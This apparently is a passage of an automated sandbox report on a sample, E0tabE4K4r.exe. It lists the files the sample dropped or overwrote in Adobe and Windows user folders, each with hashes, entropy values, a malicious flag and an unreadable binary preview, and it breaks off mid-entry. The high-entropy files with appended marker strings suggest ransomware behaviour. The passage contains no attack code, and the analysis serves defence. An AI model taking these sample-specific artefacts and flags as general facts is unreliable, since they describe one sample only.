                                                                                                                                                  C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65784
                                                                                                                                                  Entropy (8bit):7.997183392021537
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:Zq1fiN4mMG9VlZjaZNNuA2W1AC0lcVC1GILuAxSC13:g1fiN489jZjaX2hl4C1GTQ13
                                                                                                                                                  MD5:143D74986923CF074B4016F539A5EE59
                                                                                                                                                  SHA1:370B1382CDC7A6D31D307168ACB522E293F66CF4
                                                                                                                                                  SHA-256:4B02C1743669C4665D786001CE0E90FF8C5DA77AEAFFEA8B7EE455A9C734BE9B
                                                                                                                                                  SHA-512:40298044DEC6975FAE6F4F8E5906136362F72CCF05B003299C4185362227BC24B8D7B2D8EF24B50A40E5CEFD18C4167329464015DA9D041FDD1D80C7BDBEF40D
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:0...08 ...V.S^6. .n:..`.....O..k3.H.....n..SL~&..?......E...F........9...&..+3!s...Ku.....+.;.dA.....d#.8..V ....k..'.8 .ufB.q&..o..eV......Z...Cb..OQ....a'.Y..\..,F..../27#.K."..P(....b........[...1l.....9%...L...prH..k..Y.M...V -+W/.$.r....=....K....`./...~.+?.,...K.Sb.D3.M+o.U..p...B.e.,.8.>..^:E....b..QD..:&...v..2.6.f.LwD...pQ..I..`G...e.~}6S.-.a...E$.t...{.....r.C+k-5.7.QJ.*.....JE...C..K/d~+.;....Z.*$d./.......#..w.q&...o...X2kh;TZr.|.)z...BL......~..s....r..h.......>*...p...;..0.S.c!....p....~3M? ...<.m.....R....R..WD..&..C1>Ms..k......[.7...!Sm..bQ.7.....O!,....8^}Z8..;..j..ALh..P.X..Wx0C6.iK.....c...g]S.9....lc......l...,;.}.5...HN.a.1.$..Y..(@qn...l..-M.........S\..z'..=.rZV7.s....%F.h...g[...`.9Q,R..>....h..B..7.)..z!{.........q(o~...8.....(...U."^........1U.x..VB..Y......U%W.......e..eD..c....>...1..8.S.\...wW.T..n`.E.g.S%.AK.....U...*...E....l..k.e.5....z...HY...1..tP....*^.0J..l....X...'7.gt..3.~.eU..v..zv.G...

                                                                                                                                                  C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1071
                                                                                                                                                  Entropy (8bit):7.820518411833833
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:y87/g4VKt6KAdEkITbNLmSiAF+TzRtLp7uuXMtRUym/PNukM2bD:yFt65HITpDiq+TzRtLp608QzfD
                                                                                                                                                  MD5:441A40D7ECA0A5E745F721F7D3AEAB66
                                                                                                                                                  SHA1:AC504A719F996CA2BACC5755851BB7AFF6E667ED
                                                                                                                                                  SHA-256:B1513B45E98B951CE0F020A6EA499B7E865E9DAC645375C15B120B6E2788C43B
                                                                                                                                                  SHA-512:711727354201A469215F6766FB56C873ABCC5DD475823E802FCE422F7C58046EA8EEF39541B7D2833E7197EFAD94BC3348A2E722A902208092C668C704816316
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:0...0...@.L.4zo...\..X...O...M.M...1-...~V..o.l.b..v..W...i....8.X..gG..[..3T...G.Yf...'.b..Q.zH.&..F...t.Df/.Tu...A.&?.....`..,$.%....^x....Kg.a..;..$..............p....#M.p+NP.k.I.{...(g@2....'..\S." .Q..uB0.{........:;...k.@C..]j.IO...)q..n..5,.+..............w..5.p.Y?y..Q.9b.:S..a.v{B.4.ro...hy...Q.y*Q..%.,.?...g7..W.a~..~...Jry.4......$.`c.l.....b.T....Kq^.'.....I.(M....+J..[...&. .)>.Y.[.5).O.Dh........s....f...`<..b..g....., ..a.......!?N.....J.....<`..%..#.R..k.(F..>..gM'..<..R..])..9r..}..,?..{....7.....I....v.6.#(..e85.A....?._..b[wQk.`.Rn..e#v:~.!S.....k..:+..,.tRY...w..9-..4.h. .....|t0gZ?9`N1-."...m..S_r.:._ ..."."p.w.g.L../.T...1...P..A....x[..n.#....2b..0,`....i.N.....(.}....s....!....y.......v...%..N.u..9cp....{...M.i....&.md....G...:B..`.8...!..7D...7....E...r....Y.........MO..#........$%.Wl.R..f......30..+.1..?..(l."..8...2..m;Q......q.i."Y........3..J...G.u...o7....&..wO..|..*vr...xod=.@..g4=..%%.=.nM...0.....mMsRxMU

                                                                                                                                                  C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMDocs.sav

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):370
                                                                                                                                                  Entropy (8bit):7.21754901338213
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:dEv9nHtpWEwV/Cp0Gcc6kc2Bxo23RPNH7OnBbsrKWfGQzKKylnIS1WdNcii96Z:iFHjLwVOpcVkzs2TH+BbseWeizyWSUdV
                                                                                                                                                  MD5:25806C7375C8AFD9DD011205A1CB1DD2
                                                                                                                                                  SHA1:55C50C9072257A5423592B36D4A3DF8A9944A289
                                                                                                                                                  SHA-256:5828B4396118159DD648401267C0647A5CF08F376B77EC700B74974F57222A02
                                                                                                                                                  SHA-512:37EC0008C105FCB49FD2C2FBFF2C7953E8DED483E3F3D12799B494988C428145F6167AABD27E1AAC0ACBF58AEB093DB6BACA4A8346D610DE35FCF800622B9736
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:%PDFT.>p..f1.u.r.p....l0.}8^\\Y..V....P .*...bE.E...x......h..c...9z.r.O36..@.......Dz..t=....{q..S[sV}....3.`.../.^y..[(..z......6|......rn.6v.'...F..q..UM;..W.Z{...E.7.r....^.p.|o*.X.PcgVR.~...n.J.Dp.y..(9........i].|.>....?Cal".....9.oh^.h.i.}IWr..5.A8l.p.wZo.~....U.q...}f...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):388
                                                                                                                                                  Entropy (8bit):7.449602325840377
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:nlVvmE4JzdFOoeBcfmpNZukmJagSSUdNcii9a:nlNmEeOoeEOuJh2bD
                                                                                                                                                  MD5:FB7C873A9F174FB00B2D4BDD38AB20DC
                                                                                                                                                  SHA1:02CD7ECDCBE6F10412E125FC0A335589727A99B2
                                                                                                                                                  SHA-256:C2ECE7A20126202B42DB278696A94AF9D5D2E104ED254E82B7BE0A8720C37967
                                                                                                                                                  SHA-512:33C0126BB8D068E398A981D698CDB982CCD77A5949CC85AB6BF964ACBDBB4D46C451D86EBDDD27A499E3569D600CE9056945AAF942EA075AB86222A846BF4669
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:%PDFT..C..g.....H.!&..-..IW..L.A(4>8.j.?....r.Qt.P.K...l.....E=.yN.j....*|..P.l.._L....x.-].._,j.5....m....%fR..p...| FVy.......O..+.....W...t...O.-.cA.|.U[........._....q+.............&`n....\..<....f.....8..,.R..^.t......D|@...!....iyB....R+.F1..`uAg...! .y <......AQ......X <~\..4..O..a[mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1352
                                                                                                                                                  Entropy (8bit):7.859462875177058
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:FTOBeA9MHih7Upep6j7yRwvgKooWXRyEP6bGF+qFWdVP6FumRO+sdBYdCRmEKMFg:pVOEUx8+Rw0oW0bGa7P6AslbD
                                                                                                                                                  MD5:D820A1EEF488F0AB791DF4FB8F9F9986
                                                                                                                                                  SHA1:25967099E5C7B1E03E01DE0EAECC8BA8ED6474F0
                                                                                                                                                  SHA-256:E141C80A9379E407FE1405F11096317029F64AC3769EDA129E6D1B8867C3BAC8
                                                                                                                                                  SHA-512:7170DD2554890F008EF30CB75EA7D2805A19A50E842289473AC030A1AC729D10D92C878870DA046D5A1965A17CF78CCC0E1AFFDD52C090ED3D29D645C6DC87D0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlX..W..PbD.,.w.%..p.L.0..e.:......K..).m^4....e......$.P3q_@..!7....N..XA....../.K'......u....@..N..!Z...2n.Q..c../......z.,..T.Z.=E....IpF..8......"..g.2......6=.$....Z.B.._...K.K|R.R.*/.r.^.:...x.....,...d..a.0...'.?.S9.4.m...a......=.YW.3..B1.7....u%....V/..k.j.y|..]?".x.vJ.7M.V.p[...q../....6..hR......u...v...0..O.-~.......oZ3....SoD%...a......`.aV+UZ...r..g.F\.'....1V.A.1....r....s.b.A.....@ .....w....GHg....8...D.s8......".....vN...b....7....;....9...4.....?...tG+....@}...4.}t..D..]ti...0E.d.(.*j.]..x.w'.1.... ..y...SiJ....v.n.M...[,..j...."n..u............Q.......8.F..H.H.U........x-{..G.g....P.h.^A...,.'B.$KC.}JDd....?.D.#.s..U...~.y..>..U....K...G.j...dz...^_..@.!M...< 2j.l<...AC.."...L.!......]n#V.WXb..I..~....a`'t..I....].O..R...dI..Td[.C...&.7.7..........s.._({.m.8.d.....w..a.a.......k..Q.v.[.O.z..I....<E|.u,mXR3Z.6...>..0.l..,.+\. Z.U.Z..'d.t.2...\..8..VE.|fw9.lX....B.&y.....g.a.P..nZI52..7..D..W.h...|...u.....{0Yx.e~m:.....a.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2424
                                                                                                                                                  Entropy (8bit):7.934926436421264
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:ylezB8D7t4LKkCNEFCYrR3wwqj3FcMLGJc9mYBBY8kPlAyltPhYtUyD:88B8/kKkCSF5rR3wwmXWcmYBBY8kPlAn
                                                                                                                                                  MD5:07764436B553AC3503B38CEF7E90C866
                                                                                                                                                  SHA1:01ED0F4E9BD6DB97C39FEA74250146D4F7C6185F
                                                                                                                                                  SHA-256:0442AA31F704B6A56C3AB7FFB400F417941C7084025CD744D106624A19A4C86C
                                                                                                                                                  SHA-512:888E6AE460AC903BEC5AEA6281F137355BCEB7225B10B0DFB6BE2B44E6620C647BCD985A473BC112B2C8185E21EEBBF2C182D798013B767DDB146A939B5E4F54
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlE..{,S.........4T^.o.jFyjJ.W.........Fa..u..3..............h...p..G....4..%..*...*..)oU...[4.-.....XR...a...M...........]2..KVb\C...6`b.C.J.V6.]A[B...`@.p.....$^Bs...i.5.o.....7.~.O^..O..u3....Xay.../j\.5=f^..y....CW..v.1..c....l....&NuE..w%n(V..#.(]U$.KN.G$..Hv1.GX.C!...hu]B.>.0'.%p..$..9.A..k.!GE.....V/.m)......(.A..r....2....n......2K*...5...2.Z*.4...Z.|{..+.c...C.q]v....s.@.9..........%V.@T.....OjY.......3].i..L..&...Q.....".|+.4.V....s.>..tN......);@k.....n..I..j(.0.i..9../..(..W.x2.r...b...@.`.f.....Q...%..>....\....0......$?`.A....%g..\.6I..........*..V.6..q....../.L..2...........kA$..'.....W..( zun.&..@.@..|.S3..b....6X."....+.MwN.g.J.w..WeSG7Q5.$QuALA.........l../....Ra..5Ed..b.**.].f..]..\1..s!...4.h...|.}.._....eZi...[<}I... .....z...."......].z....(....6o...K:.B.|.n..l..k....4%7[.2M..+..Vte...A6[:.9.>|F..6n.!vw-0...x,.+n..?R.PF(K[.,.J..o.%..a^...ITS..b.w....<...p...C.\v.x.n../...v.p.j..o..%K...B..3.._G...3.}t.=B...|.J.{.`w...

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2381
                                                                                                                                                  Entropy (8bit):7.914152235795436
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:3aIEUGEzMYHIGg7O0SYFeT/fEVsfJ7sahHoPJhFsfD:3vSEos6/gT/USJPCTFsL
                                                                                                                                                  MD5:0BE796738F5BDCC233A56962E3524623
                                                                                                                                                  SHA1:4A3FBC643A376455EB2C2CE019AC1433D1C79379
                                                                                                                                                  SHA-256:104215722B69744A14F1826A67B7146E12343963CAA40B4A64092FF4D40089DC
                                                                                                                                                  SHA-512:0128CADC2F4DD4099876E5747A290BBBE924DA2E86ACA7DDDE50462DEF07246DD0F4908DB437275F9792AD2F4ED8834E8083D0AB2D4352CA00459C30086C38B9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..g....c~.~..~.vS.[o...52.S._.@...V...re@s$.+.p.G....+;../P.9....1q.29.@.O.=....fZ..}X.._...&.9z.T.T..=DM..S.a.x.:..../.i.........m]..S....q.....6`.q..`.P[......r....^...o..M.....-:.qW=.(.fi........8........D.a.../.7a.....@i.{..-..c.tp...R%:.-=..a.:....hw...B\j...D.*-$.`...A.:x^..#.8..............9n|.....)+J.....|.mR:.{..VUT....e..x...(.vS...8.(].%...Q.q..-..j...|.-.. .rHx...g;=>.!#.\..V\.,`.. +).ck...0.u'6...z..h.6aANq.U...&....Umq....{...v.......z...r.......s.omX..7.}N...h..~.99..A@.o.v....u-Y...>.v0b..!JH..ow...)Y|.t....l3S..B..b.^....W..%IT...$.S.P..@.....g.Y_...j`)}...zz/o...vJ.q...f.r,.%O\D`.....`.j.Z...)....k...L.:....F.d.....$....x.~...P..H.o1.X.#.+k...\....Hm.i.6..DW$.M........c....g.mp,.I'..C..:W.s.b)..D..Z.DKwNo....-`.........a.....^4..j..(..........2.i..2hM.(...vr.z.e...9h..f...UH.L.+....UoP.U......It_.Za.#..n..k3.A.....&.....Z....a8..m.6..f..w..*........-{/b.?.r.j..V+.x.[o..L..o~.....n)...(...K......5..

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2398
                                                                                                                                                  Entropy (8bit):7.921826237973104
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:wv2uilXki6euRp4qN+qAbmIEJVJBREslJFSnoaXaHc0At9D:wOuid6rr4DtmIqPS0SnoaqHcFtF
                                                                                                                                                  MD5:0D00C05B3AC6750EA15C43122396BDBD
                                                                                                                                                  SHA1:48D5E5181CD361F02EA84361238DEC787AB75490
                                                                                                                                                  SHA-256:4F20ABA3A036A371FD5CEEE8F83961B3B465F57C4F16A861F59BCF97AF64ABCE
                                                                                                                                                  SHA-512:DDC9010E91C8467A0EE34B855CE2DAA81B7CF959475320CE4506772000F9D1FC727CFAA63ED6601390927B3CF44B85B94620E329855BDD77769AAD94B39B92F1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.H=.[(.z._....[...F.y.fe...I$O]....C=...ye..Y~..N........s ..X&....a../P...n...\...{p.....zz.9'..4....P%z..u``Ke....m......&......5u...F..Q.I\..N>.O.b^[.n.........v.u.}.#..d.2."8.9...t.lf.Y.~...j.Ss.EB..#...U7.....N;..b.[.`..8s......'.8.1......7mW.........f.."l...L....V.}....}Re.HV....D..M...?A..."O..j..{_...`|.._..O!..........w.....r..4.f...u..A...c9....2D.1=...LB..9.$.?dW..<.....`..........O.5!er.u....6t...@E.6.\..E..bB+...'|...S....c.%h.( n....+.f7...(.P....D...o......vV"6..Nq.OpU..{.{s......V..v...H.+....5@+.F._...[........&<....u(...n,...........DQ...KJ&.a....i@E....=,.,.LM[.pz...D...C..g6.?."........O..-...9.#. ..C@BB.f^..7......$B....=E=.....41..j.k.......+.....(\...v..5....*..YKX4F.a...J9M{.}......h..j...M.Lw.....t..8...n......K.......6..e...R.L..E#5......Q...x..J....W.._...q..KoG.......L..A..E.+../...gzs.#(l.;..a%.i..Zg.Yd-.........q.3U..;/{...<=.\.s?...?..9.W.M.h..Q>S...'..S.4J..q...s.!T.....C.Qj|(.v2...E..U7J..o

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\SavedPictures.library-ms

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1358
                                                                                                                                                  Entropy (8bit):7.867142984668462
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:0Eggipp3AUf5sgXRYXRVixie38CSX2h+mxZ02r3/0h732bD:Uf5sgEriEKUXKWID
                                                                                                                                                  MD5:C37B07B19FF06A9FAF9A631715035507
                                                                                                                                                  SHA1:4E0C9F3BF4DE9B27D1BEF19A7FA61E3437B47F26
                                                                                                                                                  SHA-256:FEFB6D94A59CA6E64BDD8912BEF020066455AF6B84B11A0D17EC24A4381CEA2D
                                                                                                                                                  SHA-512:FF788E3A52E4C827C53BCB26A679D624C067185034543E558163B0E726F68431D7B6F285A0A9B2E7EB53E1595E527979DC4ABD72445A6B0128DF93D4CAD9BC59
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.?V`...[.L....g....c,9.|...NR]...i.*u...._.../.*.......#.s........8...(..sv.x.{....t...D....}..D.......<n.R....A.Q.H.^..?..!.~.d....17B.=d..M:}.....PI.:..d.SY&.N.a..BIF.....z6r......??]..d#.J.pJ."A..>.....3~.<~;H..(c.^u53....C.....b..?.&!t...U"L..Z.M...[..#k .L.$j".....K..7...8...6=..-...{EP[......w.B..Yr...|.<..._;,.......&......$.2h.I....Uv.`....T...h2.......p.}.<.....i.. ....\....>.Fx..kk..>.B.]...^....j.....S..o..q..!o*W.7..e.....rN.'....O3Alp..S..0>...h...&.H0t..jP....d................w.kWe...9.../}K.I....k..C..Cs6B.p......*....t.=....gK[.a..?.B.7.~....9+.\..........zv$\...r....uv.:........k../.....0;\..C.<M_.,p"P..P..$/.2m.S.....Q.sW>].b.../.~Z@^.q.......:7..n.e.s:..-.kWu-........Z.Ev..`.BC...P..o.v...A.Z.U|-.....nY..&....^a..(zYmJ$Dr...t......+.hu14r.2...v..t&.2......F.@..#.h.&s....-......CH..~.......In...v0.yr....7.r.=..F.0w.V.V..S.xg.....eb."3k.w..m....%,~.65.Li..CR._.#~..E=].(H.yN=0..&.(F.[..%@...q.....!A.3PH.5........r!....s

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2409
                                                                                                                                                  Entropy (8bit):7.91624554217786
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:SZOJ19T8VWzJ6zhVxTVjaudzLzXzUw9g5YO8MJ1zkm4kofMl03wfD:FT5tihLsmXfMyMJ1om4kofMlBL
                                                                                                                                                  MD5:BDAA6B14F5820A8485AB9196612DB4FB
                                                                                                                                                  SHA1:21E8F8024C2546FA372F97D7792D0DCD35C3CD51
                                                                                                                                                  SHA-256:9B7DF6804F6E7B147F4772A61D992E8246563168823F7231D447981933D29D35
                                                                                                                                                  SHA-512:0E3066A1C530B907020A414F473B76FBA320E33C7F61A0B8613CA44326D354A65452BD46266B0A6B7107EC241ED9AAAA49BE61E12F4295A3748E9E8DFBD4AD5F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.B...Q.d.E.C#.....b..P.q..y..k.B....O+..{.....nx....'.......XMg.....*.0}...N.f~.u.B=Y^.G....O.....f.U...R<..Jk.....b</.P...MH..dk.....[..dM\ZE..I1x.@..(-.|..2..Wh.bR...p...+..d..Tkq.?.......n..[..-..R.. %."u..q..l.!Y>...4N8.C..x...$?+.......%..H{.Q#|...}......\kv.m.%8....x........dz.a.c...1..>C...%I....v..0.6.{`..i~.C....\.....qw*k.............$.#......D~.....0.-.Zy.X.I......m..l......T.].........`...A.u..K...'..6.1kK?*....A~#....O.,.:.....j'OQ..IH.X.:c..k.....|~B........H..e..E.......g.Q.. j.:O .zn.f....i6{`..P.........Q....H..<i....&p....S#..z..W....[.n..2.x..w..@..b...:...C.=z.V...=....Ff?.-.....).H..Aa.=.YVq...cl..}.Yi_.T@@.7.....4....y&..........,g{].X.cL..E.g.U...$..7....~y...'.*.N.R<+..X<.1.CY.Kv.|[.5.F....?.A,..E.1V..U.....|.;..K{.)%.p.}l.Q...!.b..V.@..q..;.n..;.=.a.q.k.s9..}.xS.PP/..6..&.....E....,.....o...."w...&d.............z..&.>.fu.i6Kv...&...6..M.r...+T..$I.!....g.w.p.ti......&[(.."......ur3...?..Dp.&J<Jo......1...A..(2...

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AIXACVYBSB.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.84650189028051
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:yxq8e0vW2ST0+LvUAR44uJjp0CKOfJD7A7kPxwudlFVQNbIhIHVeWD8Dg68o12bD:8NeOSsAV4CCKOfV7A7syUlYZekeU8B8L
                                                                                                                                                  MD5:560AA49F4BE61B6B33252C403BB94595
                                                                                                                                                  SHA1:E3DDABCC26A59178D527370693740BEE82389D41
                                                                                                                                                  SHA-256:DFFA74F2C772B7407B78EAFA95655B1D633E85101F0A4455FF20431B197A8837
                                                                                                                                                  SHA-512:757C99FF86C461C9CF0FBC3BE50BD68E054925E540A2EE3BD0CD5597AD4F5079F432642B4E3E3F4276628FE2957614360EE5499800A62ED33E3E452AD4775A47
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:AIXAC..`.z.X..#..[H..7'.f...(..."....y.5A.G...'{J.;E.7....GN.M...6.?......";A....h....I.S....y.k.iP2Y...,..".t.>...-u...5.CB^&..9w%.........5-b...: ."!C`....T.../....eu.q....k.@..rH....J.....pf.N>.,E.REZ.p......]>..R....,....E=N......u=0..HL.O..]...X.:....+]...Y...5....e.P.Lz..1..U7h=@%...w.=.;.m.....Z....T..C..h.HSosHl..V ..o.!...;:...}.B&.V.t...l\K.Z.R.5.&W.H...(.j)D.sZ..r...-6e..J.L..e./5....<...u&..4.k.......s.v.f7..?#.y<..x....U..V.U"1.{..$.....#.....)K...m..G$.l.yK.t.Q0Q.L.8.%kJAj.laH.|6..J.a+.-.^.D......9...l"J..g..i..l....A{n..P.F8=.g...1...(T..3#.pQ.&6.[...AhE..n.d......`.4hR.nz.e.Q..Ht....MN...+.m.S...F.(...|....P.%|.4......=b..V.H&................0|..t+=...Zy.@.+....F.J..o.q.v.H:.v..e.u8.K........;....wY..........3.<:.S.....!...x..2(.o.........X....'....8h..-<a.3d.......P.O*.*b............;..v%..at.C..2..`...;.MF.._.#...ZqYg3c{.>t.7.....Z.....@z<.c..9..Z....0+~..'....z.G..x..:..#..dA.r.....No.P q.Z..1.},..@....c....O.........\./.....

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CROLFSOWJY.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.865600637159202
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:eGm0AMgPJw2U2JdZB6Xe5ekvnXNW4zTHBNV3VQq7D11BPKQ00dZU2bD:en0AMKJw2U7XeTdW4zTHPVCq7vBPKX0P
                                                                                                                                                  MD5:D5BF09F5973ED764D4DC74A4AED2CBEF
                                                                                                                                                  SHA1:D542B3893EA314A7E8ABBB507FC07D84311468BB
                                                                                                                                                  SHA-256:EBB4C352C8B2B16F891A598F990C8B2C16397133C693330276068D7A2C0F4141
                                                                                                                                                  SHA-512:2ECF231CB2390AB473B80614D96EFF0D969220A43C02FF371EC7D5339B2F6577B2EDBDCE83C4A56814CE5A87D44C42050BC5EC122DE7B2B3E4FF2DBF7981B373
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:CROLFvC.....^eR.....3..d5.|fa.q.K.c|.=..N_.q....^..J......#iW........qF...e....m&.5Q.7&I@.?.k.TU.x.J.........'......,^.{.I.W./....|K..>......vz..t.@k...b;..s...q(6m.I......'.s..f[5..o.+....V.7..~...u.bE."..{.........hO.G..E..../.fY.>.z+J.y..).N...9....S..v.2Z..vy.n.1...D..PQ.....JUu.d.\.[...4.....K..Y...........tm.>m.&.....cc.T*..9..T..@..0.".&X..X...t.S......2...T`.D>}.....R6....|.]....j...,......S)U...sH.M8.d..U|..IV......,$Y.......I.4zOq.`G.4.He...-L.. ..{|.......st..p..;+X....a.......FY...4..l.}.N..3.N..{..Hg..).......[.._'A.N.;a..DC9.~..}..l[3$..y9.k.......Y..{.l..[)...D..._.N.RG[r.$..c.S.M6.Z.4..|..=..M.:..q....`...4....]PK.dJ..|.d..hX4}P.....|.U....d.F.q.%. .~.....l.d.F..d.....*#'Q....~N:...........k..S"'......=..'.GcUK.q...j.........]..=.......d.#R&.[...F$.Gv[.F*.7...w..'&........X...?..]....CMF.gI...R./..8...b.i5.J...m3k..Nh.u......HG.t.gO.../."o.E..`...x..3..?...I.....W.. q.#.I'..4...(Px.2....X....v.U..M.&...o..]......)X.{..J...1.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DTBZGIOOSO.jpg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.865101086403056
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:4duCim9BOw/j4awFxZPgSTek4lXn7OVJ9u54zXKwBlSGLypd8CJfE2bD:4kwH0awJezhWmGzK8K0CJfXD
                                                                                                                                                  MD5:B2EAE6ED6DD8C189E41EB0DAFC3F144D
                                                                                                                                                  SHA1:B2AB67C3AEB25C2F1595226030DD60816A27F3C0
                                                                                                                                                  SHA-256:2D32BE659AFA4D4C734B81B945034D06E1A61F308BDE7495C8A1FF361604FD28
                                                                                                                                                  SHA-512:A5489802FAB7D80D740B0D2C197E58DF563413B9CC1298276054CA809F10179387A3FAA1CC3E633C3DCF33054FBBA3D903E7C86A6F2FE9790685720C46ECC58A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:DTBZG...l.+..gl..dq2..S..|.D4..I)..a..VX.a....>Q.N..d.....$../D..1i[Q.P...p.NM{...'........Pv....|...nS}...Cg...I...|..-..+..K....m'.s...9..r...S->...?LQ.t.._......S.N..U....QN5...X.6J.&.&.B*.<w..v!`..w[...2?....'.q{.....xl...P_.T...[..^)(3............G?..&..x.r.os(....Y..... ........-Z...]....8....s......c.Q.Gx.@....fCF=g2F...~...G...M..n->...!Z )i...Y.f....C..w.-...F....x.8...hJ....v7r..K.6....u..Od[.....e...h...Ws.....5;..."E....'..Ju#.n..Q..^.6.+.a...i3d...kJ.8@.j(3.=.........K.j>....k..>nvL.......#ZTe{,.U(.{...u.d...Gj%.f.}.?......D.=..N.1R....m...3..1....SA..9..%.><dl..!.....a....g....O.,.G.hQ51...T..T a@QNB...V.-~..|.q.U:{..^.p..I...A...M2.S..L...K....=...9.J.b..'...M.Q[..\W...d.l@..a.g*'.. ...o.`LZ.vY.#bG^....)..m.a....j....6.[.V1.....p...sXb/...Y.#;.y".C...@Cy..nu.h..wk .....I.^.Q?G3.!f...?......4.C.hb.A..W...*...Ow.+m~.....U.&.........q..1..~....]..Vo.d....'j.9n*nw+.7.>.N$..X..8;.....AI..Gv/.....H.m..|..!.%..H.K.. md5.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\FTCMSGAPZP.mp3

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
